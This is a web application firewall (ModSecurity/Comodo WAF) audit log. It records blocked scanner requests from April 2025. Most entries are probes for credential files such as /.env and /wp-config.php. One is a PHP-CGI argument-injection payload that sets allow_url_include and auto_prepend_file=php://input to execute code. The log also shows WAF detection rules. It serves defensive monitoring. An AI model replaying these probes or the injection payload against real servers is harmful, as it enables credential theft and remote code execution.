X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --324de545-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --324de545-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744807930865097 659 (- - -) Stopwatch2: 1744807930865097 659; combined=246, p1=213, p2=0, p3=0, p4=0, p5=33, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --324de545-Z-- --6a06bd02-A-- [16/Apr/2025:20:12:16 +0700] Z_-ssJVnVduWmh0dMDNCMQAAAIw 103.236.140.4 46732 103.236.140.4 8181 --6a06bd02-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 172.191.97.121 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 172.191.97.121 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: python-httpx/0.28.1 --6a06bd02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a06bd02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744809136339487 731 (- - -) Stopwatch2: 1744809136339487 731; combined=310, p1=270, p2=0, p3=0, p4=0, p5=40, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a06bd02-Z-- --c01d0479-A-- [16/Apr/2025:20:25:41 +0700] Z_-v1Spe92T0H9-Aa0wBagAAAEY 103.236.140.4 47348 103.236.140.4 8181 --c01d0479-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 165.227.173.41 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 165.227.173.41 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c01d0479-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c01d0479-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744809941883798 710 (- - -) Stopwatch2: 1744809941883798 710; combined=285, p1=233, p2=0, p3=0, p4=0, p5=52, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c01d0479-Z-- --b364423e-A-- [16/Apr/2025:21:48:21 +0700] Z__DNSpe92T0H9-Aa0xWgwAAAEI 103.236.140.4 53472 103.236.140.4 8181 --b364423e-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 164.90.228.79 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 164.90.228.79 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --b364423e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b364423e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744814901489327 799 (- - -) Stopwatch2: 1744814901489327 799; combined=316, p1=273, p2=0, p3=0, p4=0, p5=43, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b364423e-Z-- --d354e362-A-- [16/Apr/2025:22:36:26 +0700] Z__Oehk9XPLR9cFiTEuJeAAAABE 103.236.140.4 38352 103.236.140.4 8181 --d354e362-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.63.18 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.63.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --d354e362-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d354e362-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744817786097864 950 (- - -) Stopwatch2: 1744817786097864 950; combined=435, p1=395, p2=0, p3=0, p4=0, p5=40, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d354e362-Z-- --a298c636-A-- [16/Apr/2025:22:53:12 +0700] Z__SaJVnVduWmh0dMDPJEQAAAJE 103.236.140.4 46104 103.236.140.4 8181 --a298c636-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; CLT-AL00 Build/HUAWEICLT-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/9069 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --a298c636-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a298c636-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744818792511012 695 (- - -) Stopwatch2: 1744818792511012 695; combined=311, p1=270, p2=0, p3=0, p4=0, p5=41, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a298c636-Z-- --9356a67f-A-- [17/Apr/2025:00:19:22 +0700] Z__mmipe92T0H9-Aa0yoZAAAAFc 103.236.140.4 43676 103.236.140.4 8181 --9356a67f-B-- GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.233.255.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.233.255.197 X-Forwarded-Proto: http Connection: close --9356a67f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9356a67f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".txt.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744823962313878 2177 (- - -) Stopwatch2: 1744823962313878 2177; combined=792, p1=360, p2=405, p3=0, p4=0, p5=27, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9356a67f-Z-- --6434d975-A-- [17/Apr/2025:00:19:35 +0700] Z__mpxk9XPLR9cFiTEvCQwAAAAA 103.236.140.4 44058 103.236.140.4 8181 --6434d975-B-- GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0 Host: ns1.dwitekno.co.id X-Real-IP: 103.233.255.197 X-Forwarded-Host: ns1.dwitekno.co.id X-Forwarded-Server: ns1.dwitekno.co.id X-Forwarded-For: 103.233.255.197 X-Forwarded-Proto: https Connection: close --6434d975-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6434d975-H-- Message: Access denied with code 403 (phase 2). 
Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||ns1.dwitekno.co.id|F|2"] [data ".txt.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744823975668803 2481 (- - -) Stopwatch2: 1744823975668803 2481; combined=897, p1=449, p2=415, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6434d975-Z-- --b8ebf215-A-- [17/Apr/2025:01:01:10 +0700] Z__wZhk9XPLR9cFiTEvYzAAAABQ 103.236.140.4 33338 103.236.140.4 8181 --b8ebf215-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 124.115.231.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 124.115.231.142 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --b8ebf215-C-- --b8ebf215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8ebf215-E-- --b8ebf215-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744826470070101 7207 (- - -) Stopwatch2: 1744826470070101 7207; combined=5690, p1=517, p2=5148, p3=0, p4=0, p5=25, sr=123, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8ebf215-Z-- --e2acdf73-A-- [17/Apr/2025:03:25:48 +0700] aAASTBk9XPLR9cFiTEs5DgAAAAg 103.236.140.4 43068 103.236.140.4 8181 --e2acdf73-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.114.105.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.114.105.139 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --e2acdf73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2acdf73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744835148214064 644 (- - -) Stopwatch2: 1744835148214064 644; combined=275, p1=240, p2=0, p3=0, p4=0, p5=34, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2acdf73-Z-- --37925f49-A-- [17/Apr/2025:03:25:53 +0700] aAASUSpe92T0H9-Aa0wbPQAAAFM 103.236.140.4 43252 103.236.140.4 8181 --37925f49-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.114.105.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.114.105.139 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --37925f49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37925f49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744835153745849 531 (- - -) Stopwatch2: 1744835153745849 531; combined=209, p1=180, p2=0, p3=0, p4=0, p5=29, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37925f49-Z-- --14a1a047-A-- [17/Apr/2025:04:02:07 +0700] aAAazydHtgGT4CGaO0h8RQAAAFc 103.236.140.4 48982 103.236.140.4 8181 --14a1a047-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.89.103.20 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 159.89.103.20 Accept-Encoding: gzip X-Varnish: 125781277 --14a1a047-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --14a1a047-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744837327026680 773 (- - -) Stopwatch2: 1744837327026680 773; combined=293, p1=260, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14a1a047-Z-- --fb93797c-A-- [17/Apr/2025:04:55:21 +0700] aAAnSSdHtgGT4CGaO0h9DwAAAEE 103.236.140.4 49934 103.236.140.4 8181 --fb93797c-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 142.93.0.66 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 142.93.0.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --fb93797c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb93797c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744840521380497 685 (- - -) Stopwatch2: 1744840521380497 685; combined=255, p1=219, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb93797c-Z-- --a62d2f34-A-- [17/Apr/2025:05:42:47 +0700] aAAyZydHtgGT4CGaO0h9SAAAAFU 103.236.140.4 50148 103.236.140.4 8181 --a62d2f34-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 128.199.206.102 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 128.199.206.102 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --a62d2f34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a62d2f34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744843367133890 806 (- - -) Stopwatch2: 1744843367133890 806; combined=325, p1=282, p2=0, p3=0, p4=0, p5=42, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a62d2f34-Z-- --036c273a-A-- [17/Apr/2025:07:19:10 +0700] aABI_j2cuLCXMl1vWbD33QAAABM 103.236.140.4 50558 103.236.140.4 8181 --036c273a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.69.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.69.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.5(0x17000523) NetType/4G Language/zh_CN Accept-Charset: utf-8 --036c273a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --036c273a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744849150293409 878 (- - -) Stopwatch2: 1744849150293409 878; combined=340, p1=298, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --036c273a-Z-- --9e64b00b-A-- [17/Apr/2025:07:19:43 +0700] aABJHydHtgGT4CGaO0h9mQAAAEg 103.236.140.4 50560 103.236.140.4 8181 --9e64b00b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.69.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.69.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3872.0 Safari/537.36 Edg/78.0.244.0 Accept-Charset: utf-8 --9e64b00b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e64b00b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744849183423779 852 (- - -) Stopwatch2: 1744849183423779 852; combined=340, p1=298, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e64b00b-Z-- --1238ac39-A-- [17/Apr/2025:07:39:11 +0700] aABNrydHtgGT4CGaO0h-BQAAAFU 103.236.140.4 52640 103.236.140.4 8181 --1238ac39-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Download Demon/3.5.0.11 Accept-Charset: utf-8 --1238ac39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1238ac39-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744850351532848 750 (- - -) Stopwatch2: 1744850351532848 750; combined=306, p1=273, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1238ac39-Z-- --fb2b6d6e-A-- [17/Apr/2025:08:24:38 +0700] aABYVidHtgGT4CGaO0h-zgAAAFc 103.236.140.4 56910 103.236.140.4 8181 --fb2b6d6e-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --fb2b6d6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb2b6d6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744853078359651 882 (- - -) Stopwatch2: 1744853078359651 882; combined=380, p1=332, p2=0, p3=0, p4=0, p5=48, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb2b6d6e-Z-- --efc23714-A-- [17/Apr/2025:08:24:40 +0700] aABYWJttSyr0uJld9k4dWwAAANY 103.236.140.4 56912 103.236.140.4 8181 --efc23714-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --efc23714-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efc23714-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744853080159538 809 (- - -) Stopwatch2: 1744853080159538 809; combined=328, p1=284, p2=0, p3=0, p4=0, p5=44, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efc23714-Z-- --9078df13-A-- [17/Apr/2025:08:24:41 +0700] aABYWSdHtgGT4CGaO0h-zwAAAFg 103.236.140.4 56914 103.236.140.4 8181 --9078df13-B-- GET /.env.save HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --9078df13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9078df13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: 